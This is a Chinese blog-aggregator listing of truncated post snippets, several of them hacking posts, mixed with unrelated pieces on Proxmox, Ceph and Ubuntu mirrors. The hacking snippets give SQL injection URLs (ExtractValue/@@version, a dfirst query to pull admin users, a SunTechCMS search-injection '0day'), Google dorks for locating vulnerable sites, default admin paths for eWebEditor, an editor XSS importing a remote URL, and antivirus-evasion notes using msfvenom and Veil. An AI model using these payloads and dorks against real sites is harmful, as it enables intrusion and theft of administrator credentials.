今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没
今天下了个3.8的,竟然找出一点令人兴奋的东西出来…
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道
利用方法:首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便
转载
精选
2011-01-12 13:32:45
1021阅读
全网VIP资源、通杀!
原创
2021-07-26 11:54:15
204阅读
LINUX_2.6.9_通杀EXP
转载
精选
2011-01-23 01:19:33
607阅读
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.htmlhttp://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-comm
转载
精选
2014-11-03 19:41:38
650阅读
百度关键字:inurl:index.php?ac=article&at=read&did=
===========================================================================================================
默认后台:adminsoft/index.php
转载
2011-12-05 21:35:33
537阅读
用proxmox做服务器虚拟化已经很长一段时间了,不过全玩的是单服务器,最多也就弄三台整个集群,因为没有共享存储,无法实现高可用(雇主舍不得投入,还欠俺很多工钱呢)。近期给人出了一个方案,计划用proxmox高可用的方案,虚拟出n多虚拟机,然后把业务系统部署上去。方案讨论了很多次,发现共享存储的方式,费钱又费磁盘。考虑性能的话,得用15000转的sas盘,但这种规格sas盘的容量最大是600G,而且单盘价格很高。用容量的sata盘吧,解决了容量问题,但性能又会成为瓶颈。回来对方说,有人用ceph做存储,挂接之,再创建做服务器虚拟化。
以前做过分布式存储moosefs、hadoop dfs等,都有一个软肋,即存在控制节点(或者叫命名节点一类),控制节点是关键,一死全死。最近查看moosefs官网,新版的商业版本,整出两个master来,死掉一个,其他节点选举剩下的那个节点做master。这样整出来,光存储就是好大一堆服务器了。当然,有钱的可以买商业存储,解决性能和可用性问题。既然有人推荐,那就去了解一下ceph,嘿嘿,是去中心化的架构,这一点有优势了。
虽然有人用ceph做存储,但与
转载
2018-08-01 10:07:36
2405阅读
点赞
此方法可以通杀所有版本,能通过此方法查找任何版本的源,只要这个版本已经发布了正式版就能查到,网址当然是官方的网址http://wiki.ubuntu.org.cn/Template:8.10source,这是8.10的源,如果要查找8.04的就是这样的地址http://wiki.ubuntu.org.cn/Template:8.04source,说白了就是http://wiki.ubuntu.or
转载
精选
2009-11-03 11:12:00
540阅读
在谷歌里搜索:inurl:news_more.asp?lm2=搜索到如下站点:http://www.*********/news_more.asp?lm2=1691.将“/news_more.asp?lm2=169”替换成“/admin/admin_news_pl_view.asp?id=1”2.将 |'+dfirst("[user]","[admin]&qu
原创
2013-07-16 10:53:45
1720阅读
在计算机杀毒软件目录中新建一个文件即可。代码正在编写中。哈哈。很简单,也很有效。
原创
2008-07-08 11:32:00
1601阅读
8评论
开源私有云全能冠军proxmox,一键安装,一条指令即可建立起集群。不借助外挂存储,不需要什么控制中心,谁都可以做老大,死了谁都不要紧。用了好长一段时间,把服务器虚拟化与桌面虚拟化整合到一起,这才是真超融合呢!
推荐
原创
2018-07-28 21:34:23
10000+阅读
点赞
40评论
1.实验内容1、方法对后门实验中的msf编码器进行进一步的探索使用,使用msfvenom指令生成如jar之类的文件,从而尝试达到免杀的目的;通过Veil等工具对目标程序进行加壳或者其他操作来实现免杀;使用C+ShellCode编程实现免杀;2、应用通过组合应用各种技术尽可能地实现恶意代码免杀或者是与杀软共生(如果成功实现了免杀的,简单语言描述原理,不要截图;与杀软共生的结果验证要截图)2.基础问题
1. 前言 过年对我来说和平常没什么区别,该干什么干什么。 之前没接触过 frida 这个工具,前
原创
2022-01-30 00:16:00
1159阅读
转载自T00ls
此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)!
请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵等…
本人发此贴纯属技术交流探讨, 并无怂恿别人去尝试攻击的意思!
若不接受以上条件的请自觉关闭, 由此产生的后果与作者(本人)无关!
EXP:
第一步:
http://ip/gene
原创
2013-04-24 11:00:18
1537阅读
http://www.wooyun.org/bugs/wooyun-2010-01684
http://hi.baidu.com/handt03/blog/item/a5269ced77e42d3260d09f6c.html
转载
精选
2011-03-22 23:16:49
2182阅读
Author: handt
site :upload/2011/3/201103240211173836.jpg” border=”0″ small=”0″ alt=”" />
0×01 exploit 使用演示
在 /phpweb
转载
精选
2011-03-27 21:13:47
3347阅读
前言
相信很多小伙伴在进行 web 逆向的时候,都遇到过无限 debugger。最简单的方法,在 debugger 位置,点击行号,右键 Never pause here,永远不在此处断下即可。但是这种方法就妄想通杀,显然是不大可能的,不然这种防护岂不是弄出来骗自己的。
现在很多网站,这样处理是无法绕过的。例如常规的,可能存在格式化检测,内存爆破,禁用右键,要么就会接着进入到下一个 debugg
标题:SunTechCMS 搜索型注入通杀0day
作者:hackdn
转载请注明
漏洞:
hellxman.blog.51cto.com/Search.aspx?swhere=1%'and%201=1%20and%20'%'='
hellxman.blog.51cto.com/Search.aspx?swhere=1%'and%201=2%20and
转载
2012-01-25 15:42:56
527阅读
加密算法分为三大类,对称加密、非对称加密和哈希算法。------------1 .对称加密 DES、AES等--------(由于 链接第一个帖子 写的比较详细,所以我只做补充说明) 对称加密的特点: 加密/解密使用相同的密钥 加密和解密的过程是可逆的 经典算法: DE
周末闲暇时间无聊顺便挖挖洞,低危小子的我叒找到个低危,本想着一个低危实在是食之无味,弃之又可惜,打算将域名先存起来,等过段时间有活动一块交,就在复制域名的时候,又有了不同的发现,利用以往经验,简单的进行了一波域名的"横向移动",Get到一个小的低危通杀。
作者:haris
漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
下面说说利用方法。
条件有3个:
1.开启注册
2.开启投稿
3.管理员很勤劳,会去审核文章,最鸡肋的地方了
注册会员—-发表文章
内容填写:
<style>@im\port’\http://
转载
精选
2011-06-25 13:10:20
660阅读
